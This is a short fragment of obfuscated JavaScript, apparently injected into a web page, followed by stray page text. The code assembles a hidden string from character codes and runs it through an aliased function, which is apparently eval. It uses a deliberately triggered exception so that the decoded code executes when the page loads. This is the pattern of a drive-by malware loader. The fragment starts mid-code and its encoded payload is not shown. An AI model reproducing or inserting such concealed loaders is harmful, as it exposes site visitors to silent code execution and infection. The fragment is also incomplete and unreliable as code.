if ((031 == 0x19)) if (e) s = s + String.fromCharCode((1 * w[j] + e("j%4")));
}
xz = e;
try {
document.body++
} catch (gdsgd) {
xz(s)
}

Categories

Resources